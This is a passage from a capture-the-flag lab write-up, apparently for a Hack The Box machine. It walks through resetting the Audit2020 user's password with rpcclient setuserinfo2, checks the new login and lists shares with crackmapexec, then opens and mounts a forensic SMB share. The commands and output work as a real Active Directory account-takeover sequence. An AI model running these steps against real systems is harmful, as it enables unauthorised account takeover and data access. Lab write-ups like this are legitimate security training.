35-ChangingPasswordForAudit2020
➜ ldap rpcclient -U 'support' 10.10.10.192
Password for [WORKGROUP\support]:
rpcclient $> setuserinfo2 Audit2020 23 password123!
rpcclient $>
it worked we need to use some special character in the password field, if you don't provide it complex password you ll see an error.
Using crackmapexec to check if the password was changed to user Audit2020
➜ ldap crackmapexec smb 10.10.10.192 -u Audit2020 -p 'password123!' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\Audit2020:password123!
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
It did change and now we can access forensic share.
ldap smbclient //10.10.10.192/forensic -U ""Audit2020%password123\!""
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 18:33:16 2020
.. D 0 Sun Feb 23 18:33:16 2020
commands_output D 0 Sun Feb 23 23:44:37 2020
memory_analysis D 0 Fri May 29 01:58:33 2020
tools D 0 Sun Feb 23 19:09:08 2020
5102079 blocks of size 4096. 1680064 blocks available
Mounted the share ->
sudo mount -t cifs -o 'username=audit2020,password=password123!' //10.10.10.192/forensic /mnt/htb/blackfield